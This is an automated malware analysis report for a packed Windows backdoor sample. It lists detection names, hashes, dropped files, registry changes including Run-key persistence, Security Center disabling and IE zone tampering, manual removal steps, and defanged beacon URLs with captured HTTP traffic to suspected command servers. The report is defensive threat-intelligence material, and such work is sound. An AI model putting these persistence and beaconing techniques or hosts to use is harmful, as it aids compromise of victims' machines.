Gen:Variant.Sirefef.642 (BitDefender), VirTool:Win32/Obfuscator.PS (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic.pak!cobra (VIPRE), BackDoor.Gbot.1589 (DrWeb), Gen:Variant.Sirefef.642 (B) (Emsisoft), Artemis!71C3ADD065E8 (McAfee), Trojan.Gen.2 (Symantec), Backdoor.Win32.Agent (Ikarus), Gen:Heur.Conjar.3 (FSecure), Downloader.Generic12.BRK (AVG), Win32:Konar-B [Trj] (Avast), TROJ_SPNR.0BEE12 (TrendMicro), Gen:Variant.Sirefef.642 (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Ransom.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)
Behaviour: Ransom, Trojan, Backdoor, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 71c3add065e8be550ba1d5834cf88851
SHA1: 66c294c5d1cbc1beb1934fa56e07256ce3be4cfc
SHA256: 94a7c82661a6ed5f403e1df78e956deec537e342392760493bb9bceff146f777
SSDeep: 12288:7NyWRiw6Ju8tF8uXirWgYEaJWgoXQQDYolKZG6SVT1ISJZKmBMwu fPAnmtcRWQj:hSu FJNgdglcHsSt94yamtcRWQgXh
Size: 980431 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-02-21 21:46:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables remote control of the victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316
The Backdoor injects its code into the following process(es):
3R2R.exe:1728
Explorer.EXE:1644
File activity
The process %original file name%.exe:356 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (0 bytes)
The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process 3R2R.exe:1728 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes)
%System%\config (28672 bytes)
The Backdoor deletes the following file(s):
%Program Files%\LP\4566\C.exe (0 bytes)
Registry activity
The process %original file name%.exe:356 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 E3 13 70 E4 F9 EF 3B 90 C8 E4 A9 ED 92 53 E5"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"ic5.exe" = "niBluse"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"2 Gansta.exe" = "2 Gansta"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"3R2R.exe" = "3R2R"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"Clive Barker - Books Of Blood 03.exe" = "Clive Barker - Books Of Blood 03"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe,"
The Backdoor modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies the IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Backdoor modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 2E 7E 18 C1 A3 8E 8F 7A 23 46 40 8C 32 66 89"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 2 Gansta.exe:1372 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 39 40 93 EF DC 0E 1A 59 2D 3C 1B 9C 1F 47 7C"
The process 3R2R.exe:788 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 65 EF A6 31 8D 69 89 F8 2F 7E 06 DB 98 C4 26"
The process 3R2R.exe:204 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 60 1F 43 29 C5 D4 3A 5F 91 A0 9C 32 A4 7D 2B"
The process 3R2R.exe:1728 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 03 00 00 00 14 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:55192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 15 F7 31 9E 2F 57 84 02 87 B7 06 CE 23 4A 10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To run itself automatically each time Windows is booted, the Backdoor adds the following link to its file in the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe"
Automatic startup of the following service is disabled:
[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"
The process B.tmp:328 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 F2 E2 0B E2 A0 11 E5 ED 2C 48 49 0D 3B 01 51"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\WinRAR]
"HWID" = "7B 38 43 43 36 35 45 31 46 2D 31 34 45 43 2D 34"
The process ic5.exe:316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D5 C0 ED 4E D9 0D 64 E5 C7 53 81 30 A7 D9 C9"
Dropped PE files
MD5 | File path |
---|---|
8950bca822967c72154e56665ba6f7f2 | c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\3R2R.exe |
f51eba4d54233cfc975dd5d5c4bff62f | c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe |
ba4818120b8c3c87a4437450f5968ea5 | c:\Program Files\LP\4566\B.tmp |
8950bca822967c72154e56665ba6f7f2 | c:\Program Files\LP\4566\C29.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23458 | 23552 | 4.5133 | 2cec663f64ef38694dc96bb9f9cb766d |
.rdata | 28672 | 4496 | 4608 | 3.58909 | db16645055619c0cc73276ff5c3adb75 |
.data | 36864 | 3774424 | 1024 | 3.26654 | b9d0aa986d9e766521436f5ad38cd7c5 |
.ndata | 3813376 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 3846144 | 80464 | 80896 | 3.42872 | 73f86a6245a543a96f576f96c83cda08 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 15
88e9fc280f566e75b54ad356f19bc655
8d362f9ccc6926ac693a660a0af91558
5c2b08b64a1f09f9b988a8bc46a9e630
fcca222aa86ff5586b258e4580f8757e
0016eb10d89c1f2eb9db605eb3a5770e
b2f1f0fc8745c630fb810d6d26b57116
e89791dad855d0639b8c5c31e6fd005e
4b82f8d2fde575a88ca16e77cd0c4c8a
e9d9468da93f92772e13b83aa00b19c2
9a57f10967bea58fcb881af06488fdb9
d31927526523f51d6b3f2f925cd92b9f
3c617aa1780bc50e507331c1a02b19ac
3185a136400f3b49bfc84ac977657be3
a9e3cd512751f30e22028373237b9a27
2b067884974886daf24650507c0ea1c1
Network Activity
URLs
URL | IP |
---|---|
hxxp://classicbattletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM | 67.192.254.201 |
hxxp://rumperstumprs.com/logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 | 208.73.211.182 |
hxxp://rumperstumprs.com/logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41 | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://rumperstumprs.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41 | |
www.download.windowsupdate.com | 92.123.155.155 |
ourdatatransfers.com | 208.73.211.168 |
worldorderlive.com | 208.73.211.182 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 HTTP/1.0
Host: rumperstumprs.com
User-Agent: mozilla/2.0
Connection: close
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:55:27 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>rumperstumprs.com</title>. <meta name="keywords" content="rumperstumprs.com" />. <meta name="description" content="rumperstumprs.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJDer78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A" name="rumperstumprs.com">. </frameset>. <noframes>..<body><a href="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJDer78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A">Click here to go to rumperstumprs.com</a>.</body>. </noframes>.&l
<<
<<< skipped >>>
GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41 HTTP/1.0
Connection: close
Host: rumperstumprs.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=87
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:56:03 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>rumperstumprs.com</title>. <meta name="keywords" content="rumperstumprs.com" />. <meta name="description" content="rumperstumprs.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCglnoU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJDer78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A" name="rumperstumprs.com">. </frameset>. <noframes>..<body><a href="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCglnoU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJDer78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A">Click here to go to rumperstumprs.com</a>.</body>. </noframes>.&l
<<
<<< skipped >>>
GET /lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM HTTP/1.0
Connection: close
Host: classicbattletech.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Mar 2014 01:55:23 GMT
Server: Apache
Location: hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM
Content-Length: 629
Connection: close
Content-Type: text/html; charset=iso-8859-1
